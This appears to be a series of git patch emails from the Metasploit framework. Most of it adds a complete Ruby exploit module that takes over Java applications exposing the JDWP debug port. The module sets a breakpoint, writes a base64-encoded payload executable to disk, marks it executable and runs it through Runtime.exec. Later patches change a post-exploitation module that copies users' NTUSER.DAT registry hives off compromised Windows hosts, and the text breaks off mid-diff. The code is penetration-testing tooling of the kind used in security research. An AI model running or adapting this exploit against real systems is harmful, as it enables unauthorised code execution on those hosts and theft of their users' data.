OptInt.new('BREAK_TIMEOUT', [true, 'Number of seconds to wait for a breakpoint hit', 30]), + OptInt.new('NUM_RETRIES', [true, 'Number of retries when waiting for event', 10]) + ], self.class) + end + + def check + connect + + vprint_status("#{peer} - Checking for Java Debugging Wire Protocol") + + sock.put(HANDSHAKE) + + res = sock.get(datastore['RESPONSE_TIMEOUT']) + + disconnect + + unless res + vprint_error("Unable to determine due to a connection timeout") + return Exploit::CheckCode::Unknown + end + + return Exploit::CheckCode::Appears if res == HANDSHAKE + + return Exploit::CheckCode::Safe + + end + + + # Establishes handshake with the server + def handshake + vprint_status("#{peer} - Sending the handshake...") + + sock.put(HANDSHAKE) + + res = sock.get(datastore['RESPONSE_TIMEOUT']) + + fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless res + + return res == HANDSHAKE + end + + # Forges packet for JDWP protocol + def create_packet(cmdsig, data="") + flags = 0x00 + + cmdset, cmd = cmdsig + + pktlen = data.length + 11 + + buf = [pktlen, @myid, flags, cmdset, cmd] + + pkt = buf.pack("NNCCC") + + pkt << data + + @myid += 2 + + return pkt + end + + # Reads packet response for JDWP protocol + def read_reply(timeout) + + response = sock.get(timeout) + + fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless response + + pktlen,id,flags,errcode = response.unpack('NNCn') + + response.slice!(0..10) + + fail_with(Failure::Unknown, "Server sent error with code #{errcode}") if (errcode != 0) && (flags == REPLY_PACKET_TYPE) + + return response + end + + # Returns the characters contained in the string defined in target VM + def solve_string(data) + + sock.put(create_packet(STRINGVALUE_SIG, data)) + + response = read_reply(datastore['RESPONSE_TIMEOUT']) + + return "" unless response + + return read_string(response) + + end + + # Unpacks received string structure from the server response into a normal string + def read_string(data) + + data_len = data.unpack('N')[0] + + data.slice!(0..3) + + return data.slice!(0,data_len) + + end + + # Creates a new string object in the target VM and returns its id + def create_string(data) + buf = build_string(data) + + sock.put(create_packet(CREATESTRING_SIG, buf)) + + buf = read_reply(datastore['RESPONSE_TIMEOUT']) + + return parse_entries(buf, [[@vars['objectid_size'], "obj_id"]], false) + + end + + # Packs normal string into string structure for target VM + def build_string(data) + ret = [data.length].pack('N') + ret << data + + return ret + + end + + + # Pack Fixnum for JDWP protocol + def format(fmt, value) + if fmt == "L" || fmt == 8 + return [value].pack('Q>') + elsif fmt == "I" || fmt == 4 + return [value].pack('N') + end + + fail_with(Failure::Unknown, "Unknown format") + + end + + # Unpack Fixnum from JDWP protocol + def unformat(fmt, value) + if fmt == "L" || fmt == 8 + return value[0..7].unpack('Q>')[0] + elsif fmt == "I" || fmt == 4 + return value[0..3].unpack('N')[0] + end + + fail_with(Failure::Unknown, "Unknown format") + end + + # Parses given data according to a set of formats + def parse_entries(buf, formats, explicit=true) + entries = [] + + if explicit + nb_entries = buf.unpack('N')[0] + buf.slice!(0..3) + else + nb_entries = 1 + end + + nb_entries.times do |var| + + print_status("#{peer} - #{Time.now.getutc} - Parsed #{var} classes of #{nb_entries}") if var != 0 && var % datastore['STATUS_EVERY'] == 0 + + data = {} + + formats.each { |fmt,name| + if fmt == "L" or fmt == 8 + data[name] = buf.unpack('Q>')[0] + buf.slice!(0..7) + elsif fmt == "I" or fmt == 4 + data[name] = buf.unpack('N')[0] + buf.slice!(0..3) + elsif fmt == "S" + data_len = buf.unpack('N')[0] + buf.slice!(0..3) + data[name] = buf.slice!(0,data_len) + elsif fmt == "C" + data[name] = buf.unpack('C')[0] + buf.slice!(0) + elsif fmt == "Z" + t = buf.unpack('C')[0] + buf.slice!(0) + if t == 115 + data[name] = solve_string(buf.slice!(0..7)) + elsif t == 73 + data[name], buf = buf.unpack('NN') + end + else + fail_with(Failure::UnexpectedReply, "Unexpected data when parsing server response") + end + + } + entries.append(data) + end + + return entries + end + + + # Gets the sizes of variably-sized data types in the target VM + def idsizes + + sock.put(create_packet(IDSIZES_SIG)) + response = read_reply(datastore['RESPONSE_TIMEOUT']) + + formats = [ + ["I", "fieldid_size"], + ["I", "methodid_size"], + ["I", "objectid_size"], + ["I", "referencetypeid_size"], + ["I", "frameid_size"] + ] + + entries = parse_entries(response, formats, false) + + entries.each { |entry| + entry.each{ |name,value| + @vars[name] = value + } + } + + end + + + # Gets the JDWP version implemented by the target VM + def get_version + + sock.put(create_packet(VERSION_SIG)) + + response = read_reply(datastore['RESPONSE_TIMEOUT']) + + formats = [ + ["S", "descr"], + ["I", "jdwp_major"], + ["I", "jdwp_minor"], + ["S", "vm_version"], + ["S", "vm_name"] + ] + + entries = parse_entries(response, formats, false) + + entries.each { |entry| + entry.each{ |name,value| + @vars[name] = value + } + } + + end + + + def version + return "#{@vars["vm_name"]} - #{@vars["vm_version"]}" + end + + + # Returns reference types for all classes currently loaded by the target VM + def all_classes + + return unless @classes.empty? + + sock.put(create_packet(ALLCLASSES_SIG)) + + response = read_reply(datastore['RESPONSE_TIMEOUT']) + + formats = [ + ["C", "reftype_tag"], + [@vars["referencetypeid_size"], "reftype_id"], + ["S", "signature"], + ["I", "status"] + ] + + print_status("#{peer} - Parsing list of classes...") + + @classes.append(parse_entries(response, formats)) + + end + + # Checks if specified class is currently loaded by the target VM and returns it + def get_class_by_name(name) + + @classes.each { |entry_array| + + entry_array.each { |entry| + + return entry if entry["signature"].downcase == name.downcase + } + } + + nil + end + + # Returns information for each method in a reference type (ie. object). Inherited methods are not included. + # The list of methods will include constructors (identified with the name "<init>") + def get_methods(reftype_id) + + unless @methods.has_key?(reftype_id) + + refid = format(@vars["referencetypeid_size"],reftype_id) + + sock.put(create_packet(METHODS_SIG, refid)) + + response = read_reply(datastore['RESPONSE_TIMEOUT']) + + formats = [ + [@vars["methodid_size"], "method_id"], + ["S", "name"], + ["S", "signature"], + ["I", "mod_bits"] + ] + + @methods[reftype_id] = parse_entries(response, formats) + + end + + return @methods[reftype_id] + end + + # Checks if specified method is currently loaded by the target VM and returns it + def get_method_by_name(classname, name, signature = nil) + + @methods[classname].each { |entry| + if signature.nil? + return entry if entry["name"].downcase == name.downcase + else + return entry if (entry["name"].downcase == name.downcase) && (entry["signature"].downcase == signature.downcase) + end + } + + nil + end + + + # Checks if specified class and method are currently loaded by the target VM and returns them + def get_class_and_method(looked_class, looked_method, signature = nil) + + target_class = get_class_by_name(looked_class) + + fail_with(Failure::Unknown, "Class \"#{looked_class}\" not found") unless target_class + + get_methods(target_class["reftype_id"]) + + target_method = get_method_by_name(target_class["reftype_id"], looked_method, signature) + + fail_with(Failure::Unknown, "Method \"#{looked_method}\" not found") unless target_method + + return target_class, target_method + + end + + + # Transform string contaning class and method(ie. from "java.net.ServerSocket.accept" to "Ljava/net/Serversocket;" and "accept") + def str2fqclass(s) + + i = s.rindex(".") + + fail_with(Failure::BadConfig, 'Bad defined break class') unless i + + method = s[i+1..-1] # Subtr of s, from last '.' to the end of the string + + classname = 'L' + classname << s[0..i-1].gsub(/[.]/, '/') + classname << ';' + + return classname, method + + end + + + # Resumes execution of the application after the suspend command or an event has stopped it + def resume_vm + sock.put(create_packet(RESUMEVM_SIG)) + response = read_reply(datastore['RESPONSE_TIMEOUT']) + + fail_with(Exploit::Failure::Unknown, "No network response") unless response + end + + + # Sets an event request. When the event described by this request occurs, an event is sent from the target VM + def send_event(event_code, args) + + data = [event_code].pack('C') + data << [SUSPEND_ALL].pack('C') + data << [args.length].pack('N') + + args.each { |kind,option| + + data << [kind].pack('C') + data << option + + } + + sock.put(create_packet(EVENTSET_SIG, data)) + + response = read_reply(datastore['RESPONSE_TIMEOUT']) + + fail_with(Exploit::Failure::Unknown, "No network response") unless response + + return response.unpack('N')[0] + + end + + + # Waits user defined time for an event sent from the target VM (or force event if possible) + def wait_for_event + + buf = read_reply(datastore['BREAK_TIMEOUT']) + + return buf + end + + + # Parses a received event and compares it with the expected + def parse_event_breakpoint(buf, event_id) + + num = buf[2..5].unpack('N')[0] + r_id = buf[6..9].unpack('N')[0] + + return nil unless event_id == r_id + + len = @vars["objectid_size"] + + t_id = unformat(len,buf[10..10+len-1]) + + return r_id, t_id + + end + + + # Clear a defined event request + def clear_event(event_code, r_id) + data = [event_code].pack('C') + data << [r_id].pack('N') + + sock.put(create_packet(EVENTCLEAR_SIG, data)) + + read_reply(datastore['RESPONSE_TIMEOUT']) + end + + + # Invokes a static method. The method must be member of the class type or one of its superclasses, + # superinterfaces, or implemented interfaces. Access control is not enforced; for example, private methods can be invoked. + def invoke_static(class_id, thread_id, meth_id, args = []) + + data = format(@vars["referencetypeid_size"], class_id) + data << format(@vars["objectid_size"], thread_id) + data << format(@vars["methodid_size"], meth_id) + data << [args.length].pack('N') + + args.each { |arg| + + data << arg + data << [0].pack('N') + + } + + sock.put(create_packet(INVOKESTATICMETHOD_SIG, data)) + + buf = read_reply(datastore['RESPONSE_TIMEOUT']) + + return buf + + end + + + # Invokes a instance method. The method must be member of the object's type or one of its superclasses, + # superinterfaces, or implemented interfaces. Access control is not enforced; for example, private methods can be invoked. + def invoke(obj_id, thread_id, class_id, meth_id, args = []) + + data = format(@vars["objectid_size"], obj_id) + data << format(@vars["objectid_size"], thread_id) + + data << format(@vars["referencetypeid_size"], class_id) + + data << format(@vars["methodid_size"], meth_id) + + data << [args.length].pack('N') + + args.each { |arg| + + data << arg + data << [0].pack('N') + + } + + sock.put(create_packet(INVOKEMETHOD_SIG, data)) + + buf = read_reply(datastore['RESPONSE_TIMEOUT']) + + return buf + + end + + + # Creates a new object of specified class, invoking the specified constructor. The constructor method ID must be a member of the class type. + def create_instance(class_id, thread_id, meth_id, args = []) + + data = format(@vars["referencetypeid_size"], class_id) + data << format(@vars["objectid_size"], thread_id) + data << format(@vars["methodid_size"], meth_id) + data << [args.length].pack('N') + + args.each { |arg| + + data << arg + data << [0].pack('N') + + } + + sock.put(create_packet(CREATENEWINSTANCE_SIG, data)) + + buf = read_reply(datastore['RESPONSE_TIMEOUT']) + + return buf + + end + + + def temp_path + return nil unless datastore['TMP_PATH'] + unless datastore['TMP_PATH'].end_with?('/') || datastore['TMP_PATH'].end_with?('\\') + fail_with(Failure::BadConfig, 'You need to add a trailing slash/backslash to TMP_PATH') + end + datastore['TMP_PATH'] + end + + + # Configures payload according to targeted architecture + def setup_payload + + # 1. Setting up generic values. + payload_exe = rand_text_alphanumeric(4 + rand(4)) + pl_exe = generate_payload_exe + + # 2. Setting up arch specific... + case target['Platform'] + when 'linux' + path = temp_path || '/tmp/' + payload_exe = "#{path}#{payload_exe}" + when 'windows' + path = temp_path || './' + payload_exe = "#{path}#{payload_exe}.exe" + else + fail_with(Failure::NoTarget, 'Unsupported target platform') + end + + + return payload_exe, pl_exe + end + + # Invokes java.lang.System.getProperty() for OS fingerprinting purposes + def fingerprint_os(thread_id) + + size = @vars["objectid_size"] + + # 1. Creates a string on target VM with the property to be getted + cmd_obj_ids = create_string("os.name") + + fail_with(Failure::Unknown, "Failed to allocate string for payload dumping") if cmd_obj_ids.length == 0 + + cmd_obj_id = cmd_obj_ids[0]["obj_id"] + + # 2. Gets property + data = [TAG_OBJECT].pack('C') + data << format(size, cmd_obj_id) + + data_array = [data] + + runtime_class , runtime_meth = get_class_and_method("Ljava/lang/System;", "getProperty") + + buf = invoke_static(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"], data_array) + + fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected String") unless buf[0] == [TAG_STRING].pack('C') + + str = unformat(size, buf[1..1+size-1]) + + @os = solve_string(format(@vars["objectid_size"],str)) + + end + + # Creates a file on the server given a execution thread + def create_file(thread_id, filename) + + cmd_obj_ids = create_string(filename) + + fail_with(Failure::Unknown, "Failed to allocate string for filename") if cmd_obj_ids.length == 0 + + cmd_obj_id = cmd_obj_ids[0]["obj_id"] + + size = @vars["objectid_size"] + + data = [TAG_OBJECT].pack('C') + data << format(size, cmd_obj_id) + + data_array = [data] + + runtime_class , runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "<init>", "(Ljava/lang/String;)V") + + buf = create_instance(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"], data_array) + + fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") unless buf[0] == [TAG_OBJECT].pack('C') + + file = unformat(size, buf[1..1+size-1]) + + fail_with(Failure::Unknown, "Failed to create file. Try to change the TMP_PATH") if file.nil? || (file == 0) + + register_files_for_cleanup(filename) + + return file + + end + + + # Stores the payload on a new string created in target VM + def upload_payload(thread_id, pl_exe) + + size = @vars["objectid_size"] + + runtime_class , runtime_meth = get_class_and_method("Lsun/misc/BASE64Decoder;", "<init>") + + buf = create_instance(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"]) + + fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") unless buf[0] == [TAG_OBJECT].pack('C') + + decoder = unformat(size, buf[1..1+size-1]) + + fail_with(Failure::Unknown, "Failed to create Base64 decoder object") if decoder.nil? || (decoder == 0) + + cmd_obj_ids = create_string("#{Rex::Text.encode_base64(pl_exe)}") + + fail_with(Failure::Unknown, "Failed to allocate string for payload dumping") if cmd_obj_ids.length == 0 + + cmd_obj_id = cmd_obj_ids[0]["obj_id"] + + data = [TAG_OBJECT].pack('C') + data << format(size, cmd_obj_id) + + data_array = [data] + + runtime_class , runtime_meth = get_class_and_method("Lsun/misc/CharacterDecoder;", "decodeBuffer", "(Ljava/lang/String;)[B") + + buf = invoke(decoder, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"], data_array) + + fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected ByteArray") unless buf[0] == [TAG_ARRAY].pack('C') + + pl = unformat(size, buf[1..1+size-1]) + + return pl + + end + + # Dumps the payload on a opened server file given a execution thread + def dump_payload(thread_id, file, pl) + + size = @vars["objectid_size"] + + data = [TAG_OBJECT].pack('C') + data << format(size, pl) + + data_array = [data] + + runtime_class , runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "write", "([B)V") + + buf = invoke(file, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"], data_array) + + fail_with(Failure::Unknown, "Exception ocurred when writing to file") unless buf[0] == [TAG_VOID].pack('C') + + end + + # Closes a file on the server given a execution thread + def close_file(thread_id, file) + + size = @vars["objectid_size"] + + runtime_class , runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "close") + + buf = invoke(file, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"]) + + fail_with(Failure::Unknown, "Exception ocurred when closing file") unless buf[0] == [TAG_VOID].pack('C') + + end + + + # Executes a system command on target VM making use of java.lang.Runtime.exec() + def execute_command(thread_id, cmd) + + size = @vars["objectid_size"] + + # 1. Creates a string on target VM with the command to be executed + cmd_obj_ids = create_string(cmd) + + fail_with(Failure::Unknown, "Failed to allocate string for payload dumping") if cmd_obj_ids.length == 0 + + cmd_obj_id = cmd_obj_ids[0]["obj_id"] + + # 2. Gets Runtime context + runtime_class , runtime_meth = get_class_and_method("Ljava/lang/Runtime;", "getRuntime") + + buf = invoke_static(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"]) + + fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") unless buf[0] == [TAG_OBJECT].pack('C') + + rt = unformat(size, buf[1..1+size-1]) + + fail_with(Failure::Unknown, "Failed to invoke Runtime.getRuntime()") if rt.nil? || (rt == 0) + + # 3. Finds and executes "exec" method supplying the string with the command + exec_meth = get_method_by_name(runtime_class["reftype_id"], "exec") + + fail_with(Failure::BadConfig, "Cannot find method Runtime.exec()") if exec_meth.nil? + + data = [TAG_OBJECT].pack('C') + data << format(size, cmd_obj_id) + + data_array = [data] + + buf = invoke(rt, thread_id, runtime_class["reftype_id"], exec_meth["method_id"], data_array) + + fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") unless buf[0] == [TAG_OBJECT].pack('C') + + end + + + # Sets a breakpoint on frequently called method (user-defined) + def set_breakpoint + + vprint_status("#{peer} - Setting breakpoint on class: #{datastore['BREAK_CLASS']}") + + # 1. Gets reference of the method where breakpoint is going to be setted + classname, method = str2fqclass(datastore['BREAK_CLASS']) + + break_class = get_class_by_name(classname) + + fail_with(Failure::NotFound, "Could not access #{datastore['BREAK_CLASS']}, possible is not used by application") unless break_class + + get_methods(break_class["reftype_id"]) + + m = get_method_by_name(break_class["reftype_id"], method) + + fail_with(Failure::BadConfig, "Method of Break Class not found") unless m + + # 2. Sends event request for this method + loc = [TYPE_CLASS].pack('C') + loc << format(@vars["referencetypeid_size"], break_class["reftype_id"]) + loc << format(@vars["methodid_size"], m["method_id"]) + loc << [0,0].pack('NN') + + data = [[MODKIND_LOCATIONONLY, loc]] + + r_id = send_event(EVENT_BREAKPOINT, data) + + fail_with(Failure::Unknown, "Could not set the breakpoint") unless r_id + + return r_id + end + + + # Uploads & executes the payload on the target VM + def exec_payload(thread_id) + + # 0. Fingerprinting OS + fingerprint_os(thread_id) + + vprint_status("#{peer} - Executing payload on \"#{@os}\", target version: #{version}") + + # 1. Prepares the payload + payload_exe, pl_exe = setup_payload + + # 2. Creates file on server for dumping payload + file = create_file(thread_id, payload_exe) + + # 3. Uploads payload to the server + pl = upload_payload(thread_id, pl_exe) + + # 4. Dumps uploaded payload into file on the server + dump_payload(thread_id, file, pl) + + # 5. Closes the file on the server + close_file(thread_id, file) + + # 5b. When linux arch, give execution permissions to file + cmd = "chmod +x #{payload_exe}" + execute_command(thread_id, cmd) if target['Platform'] == 'linux' + + # 6. Executes the dumped payload + cmd = "#{payload_exe}" + execute_command(thread_id, cmd) + + end + + + def exploit + + @myid = 0x01 + @vars = {} + @classes = [] + @methods = {} + @os = nil + + + check + + connect + + fail_with(Failure::UnexpectedReply, "Unexpected reply while executing the handshake") unless handshake + + # 1. Get the sizes of variably-sized data types in the target VM + idsizes + + # 2. Get the version of the target VM + get_version + + # 3. Get all currently loaded classes by the target VM + all_classes + + # 4. Sets a breakpoint on frequently called method (user-defined) + r_id = set_breakpoint + + # 5. Resume VM and wait for event + resume_vm + + secs = datastore['BREAK_TIMEOUT'] + + ret = "" + + datastore['NUM_RETRIES'].times do |i| + + print_status("#{peer} - Waiting for breakpoint hit #{i} during #{secs} seconds...") + + buf = wait_for_event() + + ret = parse_event_breakpoint(buf, r_id) + + break unless ret.nil? + + end + + r_id, t_id = ret + + vprint_status("#{peer} - Received matching event from thread #{t_id}") + + # 6. Clears event + clear_event(EVENT_BREAKPOINT, r_id) + + # 7. Drop & execute payload + exec_payload(t_id) + + resume_vm + + disconnect + + end +end \ No newline at end of file From 31c282153e35e98d45a9a6245825a69dc362a8db Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Thu, 29 May 2014 17:02:28 -0500 Subject: [PATCH 416/853] Avoid ntuser.dat md5 because is causing problems, even when data is extracted --- modules/post/windows/gather/enum_muicache.rb | 61 ++++---------------- 1 file changed, 11 insertions(+), 50 deletions(-) diff --git a/modules/post/windows/gather/enum_muicache.rb b/modules/post/windows/gather/enum_muicache.rb index bd3fa53ec3..a18335a25a 100644 --- a/modules/post/windows/gather/enum_muicache.rb +++ b/modules/post/windows/gather/enum_muicache.rb @@ -85,18 +85,17 @@ class Metasploit3 < Msf::Post def enumerate_muicache(muicache_reg_keys, sys_users, sys_paths, muicache, hive_file) results = [] - loot_path = Msf::Config::loot_directory all_user_entries = sys_users.zip(muicache_reg_keys, sys_paths) all_user_entries.each do |user, reg_key, sys_path| - local_hive_copy = ::File.join(loot_path, "#{sysinfo['Computer']}_#{user}_HIVE_#{::Time.now.utc.strftime('%Y%m%d.%M%S')}") + subkeys = registry_enumvals(reg_key) if subkeys.blank? # If the registry_enumvals returns us nothing then we'll know # that the user is most likely not logged in and we'll need to # download and process users hive locally. - print_error("User #{user}: Can't access registry (maybe the user is not logged in atm?). Trying NTUSER.DAT/USRCLASS.DAT..") - result = process_hive(sys_path, user, local_hive_copy, muicache, hive_file) + print_warning("User #{user}: Can't access registry (maybe the user is not logged in atm?). Trying NTUSER.DAT/USRCLASS.DAT..") + result = process_hive(sys_path, user, muicache, hive_file) unless result.nil? result.each { |r| results << r unless r.nil? @@ -137,60 +136,24 @@ class Metasploit3 < Msf::Post # downloading the hive. After successfull download it'll continue to # call the hive_parser function which will extract the contents of # the MUICache registry key. - def process_hive(sys_path, user, local_hive_copy, muicache, hive_file) + def process_hive(sys_path, user, muicache, hive_file) user_home_path = expand_path(sys_path) hive_path = user_home_path + hive_file ntuser_status = file_exist?(hive_path) unless ntuser_status == true - print_error("Couldn't locate/download #{user}'s registry hive. Can't proceed.") + print_warning("Couldn't locate/download #{user}'s registry hive. Can't proceed.") return nil end print_status("Downloading #{user}'s NTUSER.DAT/USRCLASS.DAT file..") - hive_status = hive_download_status(local_hive_copy, hive_path) + local_hive_copy = Rex::Quickfile.new("jtrtmp") + local_hive_copy.close + session.fs.file.download_file(local_hive_copy.path, hive_path) + results = hive_parser(local_hive_copy.path, muicache, user) + local_hive_copy.unlink rescue nil # Windows often complains about unlinking tempfiles - unless hive_status == true - print_error("All registry hive download attempts failed. Unable to continue.") - return nil - end - - hive_parser(local_hive_copy, muicache, user) - end - - # This function downloads registry hives and checks for integrity - # after the transfer has completed so that we don't end up - # processing broken registry hive. - def hive_download_status(local_hive_copy, hive_path) - hive_status = false - - 3.times do - begin - remote_hive_hash_raw = file_remote_digestmd5(hive_path) - rescue EOFError, ::Rex::Post::Meterpreter::RequestError - next - end - - if remote_hive_hash_raw.blank? - next - end - - remote_hive_hash = remote_hive_hash_raw.unpack('H*') - session.fs.file.download_file(local_hive_copy, hive_path) - local_hive_hash = file_local_digestmd5(local_hive_copy) - if local_hive_hash == remote_hive_hash[0] - print_good("Hive downloaded successfully.") - hive_status = true - break - else - print_error("Hive download corrupted, trying again (max 3 times)..") - File.delete(local_hive_copy) # Downloaded corrupt hive gets deleted before new attempt is made - hive_status = false - end - - end - - hive_status + results end # This function is responsible for parsing the downloaded hive and @@ -231,8 +194,6 @@ class Metasploit3 < Msf::Post end end - File.delete(local_hive_copy) # Downloaded hive gets deleted after processing - results end From f2a71a47ca93aadbfd0e35521f34551431c6cf4e Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Thu, 29 May 2014 17:04:38 -0500 Subject: [PATCH 417/853] Use \&\& instead of and --- modules/post/windows/gather/enum_muicache.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/post/windows/gather/enum_muicache.rb b/modules/post/windows/gather/enum_muicache.rb index a18335a25a..89fd17f3e6 100644 --- a/modules/post/windows/gather/enum_muicache.rb +++ b/modules/post/windows/gather/enum_muicache.rb @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Post # the content collected from there. print_status("User #{user}: Enumerating registry..") subkeys.each do |key| - if key[0] != "@" and key != "LangID" and not key.nil? + if key[0] != "@" && key != "LangID" && !key.nil? result = check_file_exists(key, user) results << result unless result.nil? end @@ -188,7 +188,7 @@ class Metasploit3 < Msf::Post muicache_key_values.each do |value| key = value.name - if key[0] != "@" and key != "LangID" and not key.nil? + if key[0] != "@" && key != "LangID" && !key.nil? result = check_file_exists(key, user) results << result unless result.nil? end From a6229aedff2f8b9fb1a012dd6617e8099c7e98d4 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Thu, 29 May 2014 17:07:22 -0500 Subject: [PATCH 418/853] Rescue RequestError when downloading file --- modules/post/windows/gather/enum_muicache.rb | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/modules/post/windows/gather/enum_muicache.rb b/modules/post/windows/gather/enum_muicache.rb index 89fd17f3e6..dbf8824fd9 100644 --- a/modules/post/windows/gather/enum_muicache.rb +++ b/modules/post/windows/gather/enum_muicache.rb @@ -149,7 +149,13 @@ class Metasploit3 < Msf::Post print_status("Downloading #{user}'s NTUSER.DAT/USRCLASS.DAT file..") local_hive_copy = Rex::Quickfile.new("jtrtmp") local_hive_copy.close - session.fs.file.download_file(local_hive_copy.path, hive_path) + begin + session.fs.file.download_file(local_hive_copy.path, hive_path) + rescue ::Rex::Post::Meterpreter::RequestError + print_error("Unable to download NTUSER.DAT/USRCLASS.DAT file") + local_hive_copy.unlink rescue nil + return nil + end results = hive_parser(local_hive_copy.path, muicache, user) local_hive_copy.unlink rescue nil # Windows often complains about unlinking tempfiles From 60c530747581beb0528c8e6c23c5176543ba2978 Mon Sep 17 00:00:00 2001 From: Julian Vilas <julian.vilas@gmail.com> Date: Fri, 30 May 2014 00:14:59 +0200 Subject: [PATCH 419/853] Fix msftidy --- .../exploits/multi/misc/java_jdwp_debugger.rb | 101 +++++++++--------- 1 file changed, 50 insertions(+), 51 deletions(-) mode change 100755 => 100644 modules/exploits/multi/misc/java_jdwp_debugger.rb diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb old mode 100755 new mode 100644 index dd0be92a3b..c1cda6eded --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb @@ -73,7 +73,6 @@ class Metasploit3 < Msf::Exploit::Remote to execute code remotely. }, 'Author' => [ - 'Christophe Alladoum', # Exploit 'Redsadic <julian.vilas[at]gmail.com>' # Metasploit Module ], @@ -164,17 +163,17 @@ class Metasploit3 < Msf::Exploit::Remote flags = 0x00 cmdset, cmd = cmdsig - + pktlen = data.length + 11 - + buf = [pktlen, @myid, flags, cmdset, cmd] pkt = buf.pack("NNCCC") - + pkt << data - + @myid += 2 - + return pkt end @@ -230,7 +229,7 @@ class Metasploit3 < Msf::Exploit::Remote end - # Packs normal string into string structure for target VM + # Packs normal string into string structure for target VM def build_string(data) ret = [data.length].pack('N') ret << data @@ -263,7 +262,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "Unknown format") end - # Parses given data according to a set of formats + # Parses given data according to a set of formats def parse_entries(buf, formats, explicit=true) entries = [] @@ -275,7 +274,7 @@ class Metasploit3 < Msf::Exploit::Remote end nb_entries.times do |var| - + print_status("#{peer} - #{Time.now.getutc} - Parsed #{var} classes of #{nb_entries}") if var != 0 && var % datastore['STATUS_EVERY'] == 0 data = {} @@ -316,16 +315,16 @@ class Metasploit3 < Msf::Exploit::Remote # Gets the sizes of variably-sized data types in the target VM def idsizes - + sock.put(create_packet(IDSIZES_SIG)) response = read_reply(datastore['RESPONSE_TIMEOUT']) - formats = [ - ["I", "fieldid_size"], - ["I", "methodid_size"], - ["I", "objectid_size"], - ["I", "referencetypeid_size"], - ["I", "frameid_size"] + formats = [ + ["I", "fieldid_size"], + ["I", "methodid_size"], + ["I", "objectid_size"], + ["I", "referencetypeid_size"], + ["I", "frameid_size"] ] entries = parse_entries(response, formats, false) @@ -346,12 +345,12 @@ class Metasploit3 < Msf::Exploit::Remote response = read_reply(datastore['RESPONSE_TIMEOUT']) - formats = [ - ["S", "descr"], - ["I", "jdwp_major"], - ["I", "jdwp_minor"], - ["S", "vm_version"], - ["S", "vm_name"] + formats = [ + ["S", "descr"], + ["I", "jdwp_major"], + ["I", "jdwp_minor"], + ["S", "vm_version"], + ["S", "vm_name"] ] entries = parse_entries(response, formats, false) @@ -379,11 +378,11 @@ class Metasploit3 < Msf::Exploit::Remote response = read_reply(datastore['RESPONSE_TIMEOUT']) - formats = [ - ["C", "reftype_tag"], + formats = [ + ["C", "reftype_tag"], [@vars["referencetypeid_size"], "reftype_id"], - ["S", "signature"], - ["I", "status"] + ["S", "signature"], + ["I", "status"] ] print_status("#{peer} - Parsing list of classes...") @@ -394,7 +393,7 @@ class Metasploit3 < Msf::Exploit::Remote # Checks if specified class is currently loaded by the target VM and returns it def get_class_by_name(name) - + @classes.each { |entry_array| entry_array.each { |entry| @@ -406,7 +405,7 @@ class Metasploit3 < Msf::Exploit::Remote nil end - # Returns information for each method in a reference type (ie. object). Inherited methods are not included. + # Returns information for each method in a reference type (ie. object). Inherited methods are not included. # The list of methods will include constructors (identified with the name "<init>") def get_methods(reftype_id) @@ -418,11 +417,11 @@ class Metasploit3 < Msf::Exploit::Remote response = read_reply(datastore['RESPONSE_TIMEOUT']) - formats = [ - [@vars["methodid_size"], "method_id"], - ["S", "name"], - ["S", "signature"], - ["I", "mod_bits"] + formats = [ + [@vars["methodid_size"], "method_id"], + ["S", "name"], + ["S", "signature"], + ["I", "mod_bits"] ] @methods[reftype_id] = parse_entries(response, formats) @@ -458,16 +457,16 @@ class Metasploit3 < Msf::Exploit::Remote target_method = get_method_by_name(target_class["reftype_id"], looked_method, signature) - fail_with(Failure::Unknown, "Method \"#{looked_method}\" not found") unless target_method + fail_with(Failure::Unknown, "Method \"#{looked_method}\" not found") unless target_method return target_class, target_method end - # Transform string contaning class and method(ie. from "java.net.ServerSocket.accept" to "Ljava/net/Serversocket;" and "accept") + # Transform string contaning class and method(ie. from "java.net.ServerSocket.accept" to "Ljava/net/Serversocket;" and "accept") def str2fqclass(s) - + i = s.rindex(".") fail_with(Failure::BadConfig, 'Bad defined break class') unless i @@ -479,7 +478,7 @@ class Metasploit3 < Msf::Exploit::Remote classname << ';' return classname, method - + end @@ -494,7 +493,7 @@ class Metasploit3 < Msf::Exploit::Remote # Sets an event request. When the event described by this request occurs, an event is sent from the target VM def send_event(event_code, args) - + data = [event_code].pack('C') data << [SUSPEND_ALL].pack('C') data << [args.length].pack('N') @@ -517,7 +516,7 @@ class Metasploit3 < Msf::Exploit::Remote end - # Waits user defined time for an event sent from the target VM (or force event if possible) + # Waits user defined time for an event sent from the target VM (or force event if possible) def wait_for_event buf = read_reply(datastore['BREAK_TIMEOUT']) @@ -537,7 +536,7 @@ class Metasploit3 < Msf::Exploit::Remote len = @vars["objectid_size"] t_id = unformat(len,buf[10..10+len-1]) - + return r_id, t_id end @@ 